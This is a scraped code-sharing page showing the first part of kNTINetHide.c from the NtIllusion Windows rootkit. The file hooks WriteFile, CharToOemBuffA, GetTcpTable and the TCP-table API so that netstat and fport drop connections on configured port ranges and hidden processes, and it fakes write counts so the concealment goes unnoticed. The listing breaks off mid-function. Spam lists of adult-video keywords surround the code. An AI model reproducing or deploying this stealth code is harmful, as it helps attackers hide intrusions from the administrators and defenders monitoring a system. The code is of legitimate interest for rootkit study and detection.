亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? kntinethide.c

?? rootit uloading by benina
?? C
?? 第 1 頁 / 共 2 頁
字號:
/******************************************************************************
  kNTINetHide.c	: Network stealth
  *****************************************************************************
  Author		: Kdm (Kodmaker@syshell.org)
  WebSite		: http://www.syshell.org

  Copyright (C) 2003,2004 Kdm
  *****************************************************************************
  This file is part of NtIllusion.

  NtIllusion is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 2 of the License, or
  (at your option) any later version.

  NtIllusion is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with NtIllusion; if not, write to the Free Software
  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  ******************************************************************************/

#include <winsock2.h>				// for socket hijack
#include <tlhelp32.h>				// Tool help 32 functions
#include <windows.h>
#include "kNTINetHide.h"
#include "../../Misc/kNTIConfig.h"
#include "../../Misc/kNTILib.h"

FARPROC fAllocateAndGetTcpExTableFromStack;
FARPROC fGetTcpTable;
FARPROC fCharToOemBuffA;
FARPROC fDeviceIoControl;
FARPROC fWriteFile;
extern FARPROC fGetProcAddress;	// import genuine GetProcAddress

void ShowError()
{
LPVOID lpMsgBuf;
FormatMessage( 
    FORMAT_MESSAGE_ALLOCATE_BUFFER | 
    FORMAT_MESSAGE_FROM_SYSTEM | 
    FORMAT_MESSAGE_IGNORE_INSERTS,
    NULL,
    GetLastError(),
    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
    (LPTSTR) &lpMsgBuf,
    0,
    NULL 
);
// Process any inserts in lpMsgBuf.
// ...
// Display the string.
//OutputString( "Error: %s (%d)\n", (LPCTSTR)lpMsgBuf, GetLastError());
OutputString( "Error: %s\n", (LPCTSTR)lpMsgBuf);
// Free the buffer.
LocalFree( lpMsgBuf );

}

// Convert FPORT.exe's output mode from char by char to line by line to allow hidding
// of lines containing ports to hide
BOOL WINAPI MyWriteFile(
  HANDLE hFile,                    // handle to file to write to
  LPCVOID lpBuffer,                // pointer to data to write to file
  DWORD nNumberOfBytesToWrite,     // number of bytes to write
  LPDWORD lpNumberOfBytesWritten,  // pointer to number of bytes written
  LPOVERLAPPED lpOverlapped        // pointer to structure for overlapped I/O
  ){
	BOOL bret=TRUE;
	static DWORD total_len=0;
	static char PreviousChars[2048*10];	// bof? ;p
	char* chr = (char*)lpBuffer;

	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fWriteFile) {
		fWriteFile = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"WriteFile");
		if(!fWriteFile) return 0;
	}

	PreviousChars[total_len++] = chr[0]; // add new char
	if(chr[0] == '\r') 
	{

		PreviousChars[total_len] = '\n';
		PreviousChars[++total_len] = '\0';
		// show this line only if it contains no hidden port / process prefix
		if(strstr((char*)PreviousChars,(char*)RTK_PORT_HIDE_STR)==NULL	// hidden port ?
		&& strstr((char*)PreviousChars,(char*)RTK_PROCESS_CHAR)==NULL)  // hidden process ?
		{
			bret = fWriteFile(hFile, (void*)PreviousChars, strlen((char*)PreviousChars), lpNumberOfBytesWritten, lpOverlapped);
		}
		else
		{
			OutputString("[!] NTIllusion made a port hidden (%s* range)\n", (int)RTK_PORT_HIDE_STR);
		}
		
		memset(PreviousChars, 0, 2048);
		total_len= 0;
	}
	(*lpNumberOfBytesWritten) = nNumberOfBytesToWrite; // fake var, so fport can't see output wasn't done
	return bret;
}


// Used by fport to directly get tcp/udp information
// cf http://www.rootkit.com/board.php?thread=1120&did=edge103&disp=1120
// We won't hijack here as dwIoControlCode and data structures are subject to change
BOOL WINAPI MyDeviceIoControl(HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer,
  DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned,
  LPOVERLAPPED lpOverlapped )
{
	//OutputString("[!] MyDeviceIoControl(dwIoControlCode==%x)\n", dwIoControlCode);
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fDeviceIoControl) {
		fDeviceIoControl = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"DeviceIoControl");
		if(!fDeviceIoControl) return 0;
	}
	
	return (*fDeviceIoControl)(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, 
		lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped);
}


//		MyCharToOemBuffA : replace the function used by nestat to convert strings to a different
//		charset before it sends it to output, so we can get rid of some awkward lines...  :)
BOOL WINAPI MyCharToOemBuff(LPCTSTR lpszSrc, LPSTR lpszDst, DWORD cchDstLength)
{
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fCharToOemBuffA) {
		fCharToOemBuffA = (FARPROC) fGetProcAddress(GetModuleHandle("user32.dll"),"CharToOemBuffA");
		if(!fCharToOemBuffA) return 0;
	}

	// If the line contains our range of port, we simply get rid of it.
	if(strstr(lpszSrc,(char*)RTK_PORT_HIDE_STR)!=NULL)
	{
		if(VERBOSE_STEALTH) {
			OutputString("[!] NTIllusion made a port hidden (%s* range)\n", (int)RTK_PORT_HIDE_STR);
		}
		return (*fCharToOemBuffA)("", lpszDst, cchDstLength); 
	}
	return (*fCharToOemBuffA)(lpszSrc, lpszDst, cchDstLength);
}



// Returns 1 if Row must be hidden according to parameters passed
// if( IsHidden( htons((u_short)portX), htons((u_short)portY) ) ) ...
int IsHidden(u_long LocalPort, u_long RemotePort) 
{
	int hidethis=0;

	if(	((LocalPort >=RTK_PORT_HIDE_MIN) &&   (LocalPort<=RTK_PORT_HIDE_MAX))	// local port is in hidden range ?
	||  ((RemotePort>=RTK_PORT_HIDE_MIN) &&   (RemotePort <= RTK_PORT_HIDE_MAX))// remote port is in hidden range ?
	||  (LocalPort *10) == RTK_PORT_HIDE_MIN									// is RTK_PORT_HIDE_STR?			
	||  (RemotePort*10) == RTK_PORT_HIDE_MIN									// is RTK_PORT_HIDE_STR?
	)	
		hidethis=1;
	
	return hidethis;
}

DWORD WINAPI MyGetTcpTable(PMIB_TCPTABLE_ pTcpTable, PDWORD pdwSize, BOOL bOrder)
{
	FARPROC fhtons;
	HINSTANCE hLib;
	HINSTANCE hDll;
	u_long LocalPort=0, RemotePort=0;
	DWORD dwRetVal=0, numRows=0;
	FARPROC fGetTcpTable;
	int i,j;


	// Resolve fGetTcpTable
	hLib = LoadLibrary("iphlpapi.dll");
	if(!hLib)
		OutputString("!hlib\n");

	fGetTcpTable = (FARPROC) fGetProcAddress(hLib, "GetTcpTable");
	if(!fGetTcpTable)
		OutputString("!fGetTcpTable\n");

	
	// Resolve htons
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) fGetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}


	// Call function, if no error, strip unwanted MIB_TCPROWs
	if ((dwRetVal = (*fGetTcpTable)(pTcpTable, pdwSize, bOrder)) == NO_ERROR) 
	{

		// for each row, test if it must be stripped
		for (i=0; i<(int)pTcpTable->dwNumEntries; i++) 
		{

			LocalPort	= (u_short) fhtons((u_short)(pTcpTable)->table[i].dwLocalPort);
			RemotePort	= (u_short) fhtons((u_short)(pTcpTable)->table[i].dwRemotePort);
			OutputString("#	GetTcpTable %d<=>%d\n", LocalPort, RemotePort);

			// If row must be filtered
			if( IsHidden(LocalPort, RemotePort) )
			{
				OutputString("filtering port %d\n", LocalPort);
				
				for(j=i; j<((int)pTcpTable->dwNumEntries - 1); j++)
					memcpy( &(pTcpTable->table[i]), &(pTcpTable->table[i+1]), sizeof(MIB_TCPROW_));
				memset( &(pTcpTable->table[j]), 0x00, sizeof(MIB_TCPROW_));
				
				(*pdwSize)-= sizeof(MIB_TCPROW_);
				(pTcpTable->dwNumEntries)--;
				// o o o o
				// 0 1 2 3

			}	  
		}
	}

	return dwRetVal;
}


//		AllocateAndGetTcpExTableFromStack : Universal TCP ports state review hook.
//		This will hide all connections whose :
//		- local port is in hidden range
//		- remote port is in hidden range
//		- process name starts by RTK_FILE_CHAR
//		- process name is unknow
//		Dued to crosschecks between hijacked functions, any unknown process must be
//		considered as a hidden process.

// Netstat :
// MyAllocateAndGetTcpExTableFromStack only used when flag -o (process associated with
// open port) is triggered.

// consulter les sources de netstatk
DWORD WINAPI MyAllocateAndGetTcpExTableFromStack( 
  PMIB_TCPEXTABLEEx *pTcpTable,	// buffer for the connection table
  BOOL bOrder,					// sort the table?
  HANDLE heap,
  DWORD zero,

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲图片自拍偷拍| 不卡av免费在线观看| 成人激情开心网| 欧美精品久久天天躁| 亚洲特黄一级片| 国产精选一区二区三区| 51精品久久久久久久蜜臀| 亚洲欧美另类综合偷拍| 韩国精品久久久| 日韩欧美亚洲国产另类| 一区二区三区欧美日韩| 本田岬高潮一区二区三区| 欧美精品一区二区久久婷婷 | 一本久久a久久免费精品不卡| 91精品综合久久久久久| 亚洲美女免费在线| 北条麻妃一区二区三区| 久久久久久久久久电影| 加勒比av一区二区| 日韩免费看网站| 免费美女久久99| 欧美日韩一级片在线观看| 亚洲美女视频在线| 在线免费观看成人短视频| 亚洲欧美色综合| 在线中文字幕不卡| 亚洲乱码中文字幕| 色综合 综合色| 亚洲人成人一区二区在线观看| 国产盗摄一区二区三区| 国产片一区二区三区| 国产一区二区三区免费播放| 欧美刺激脚交jootjob| 免费观看久久久4p| 精品粉嫩aⅴ一区二区三区四区| 日本成人在线网站| 精品久久久久一区二区国产| 国精产品一区一区三区mba视频| 精品成人佐山爱一区二区| 国产精品影视在线| 国产精品色哟哟网站| 岛国精品在线播放| 亚洲欧美日本韩国| 欧美日韩二区三区| 麻豆精品一二三| 久久久激情视频| 91在线观看高清| 亚洲成人一二三| 久久亚洲影视婷婷| zzijzzij亚洲日本少妇熟睡| 亚洲色图在线播放| 欧美日韩国产在线观看| 毛片一区二区三区| 中文一区在线播放| 欧美色视频在线观看| 青青青伊人色综合久久| 国产亚洲成aⅴ人片在线观看| 成人福利电影精品一区二区在线观看| 亚洲视频你懂的| 日韩精品一区二区在线观看| 不卡影院免费观看| 视频在线在亚洲| 国产精品天干天干在线综合| 欧美影院午夜播放| 国产二区国产一区在线观看| 一区二区三区四区视频精品免费| 7777精品伊人久久久大香线蕉| 国产乱码精品1区2区3区| 一区二区三区小说| 2024国产精品| 欧美性做爰猛烈叫床潮| 国产成人午夜电影网| 亚洲午夜私人影院| 亚洲国产精品国自产拍av| 欧美日韩大陆在线| av资源站一区| 激情综合色丁香一区二区| 一区二区三区四区中文字幕| 精品久久久久久久人人人人传媒| 色婷婷综合久久| 国产精品1区2区3区在线观看| 亚洲成人你懂的| 日韩久久一区二区| 久久久久久久免费视频了| 欧美丰满美乳xxx高潮www| 91视视频在线直接观看在线看网页在线看| 日韩精品电影在线观看| 日韩一区有码在线| 国产日韩欧美综合在线| 日韩一区二区在线观看视频| 欧美亚洲一区二区三区四区| 成人av网站在线观看免费| 国产一区二区美女诱惑| 日韩国产高清影视| 亚洲精品高清在线| 国产精品乱人伦| 久久久久久久综合狠狠综合| 日韩精品一区在线观看| 欧美一卡二卡在线观看| 欧美区一区二区三区| 91福利小视频| 色天天综合久久久久综合片| 91网上在线视频| 9l国产精品久久久久麻豆| 成人午夜精品在线| 国产一区二区91| 激情文学综合插| 久草精品在线观看| 久久国产综合精品| 久草在线在线精品观看| 久久精品99国产精品日本| 免费欧美日韩国产三级电影| 久久精品国产亚洲aⅴ| 七七婷婷婷婷精品国产| 日产精品久久久久久久性色| 丝袜美腿成人在线| 日本aⅴ免费视频一区二区三区 | 五月综合激情网| 亚洲成av人片一区二区三区| 天天综合天天综合色| 亚洲国产欧美在线| 强制捆绑调教一区二区| 六月丁香婷婷久久| 国产一区二区看久久| 国产馆精品极品| 99久久国产综合精品麻豆| 一本色道a无线码一区v| 精品视频全国免费看| 欧美一区二区在线看| 日韩欧美国产成人一区二区| 精品区一区二区| 欧美国产日韩一二三区| 亚洲男女毛片无遮挡| 亚洲丶国产丶欧美一区二区三区| 日韩 欧美一区二区三区| 国产一区二区在线电影| 91精品国产综合久久久蜜臀粉嫩| 日韩一区二区三区电影在线观看| 欧美亚洲国产一区在线观看网站| www.在线成人| 欧美日韩综合在线| 91黄色激情网站| 欧美一区二区三区精品| 久久亚洲精品小早川怜子| 亚洲欧洲精品成人久久奇米网| 一区二区三区国产豹纹内裤在线| 琪琪久久久久日韩精品| 国产1区2区3区精品美女| 色噜噜狠狠一区二区三区果冻| 欧美日韩久久久| 国产日本亚洲高清| 亚洲高清在线精品| 国产成人99久久亚洲综合精品| 91久久免费观看| 久久一日本道色综合| 亚洲不卡一区二区三区| 国产乱理伦片在线观看夜一区| 在线视频亚洲一区| 精品国产成人系列| 亚洲成人免费视频| 99视频在线观看一区三区| 91国偷自产一区二区三区观看 | 精品综合免费视频观看| 国产成人免费视频网站| 欧美久久久一区| 中文一区二区在线观看| 另类人妖一区二区av| 91亚洲大成网污www| 欧美tickling挠脚心丨vk| 亚洲精品国产一区二区精华液| 美女高潮久久久| 欧美日韩国产精品成人| 亚洲欧洲另类国产综合| 国产精品996| 精品91自产拍在线观看一区| 亚洲国产成人av好男人在线观看| 国产999精品久久久久久| 日韩女同互慰一区二区| 午夜国产不卡在线观看视频| av电影在线观看一区| 久久精品这里都是精品| 免费的成人av| 欧美精品久久久久久久久老牛影院 | 欧美日韩视频在线一区二区 | 不卡电影一区二区三区| 久久伊人中文字幕| 精品一区二区在线观看| 制服丝袜亚洲网站| 日韩不卡一二三区| 欧美肥大bbwbbw高潮| 日韩主播视频在线| 欧美军同video69gay| 香蕉成人伊视频在线观看| 在线观看三级视频欧美| 亚洲国产视频一区二区| 欧美视频一区二| 午夜伦理一区二区| 91精品国产91久久久久久一区二区| 亚洲一区二区精品视频| 欧美精品九九99久久|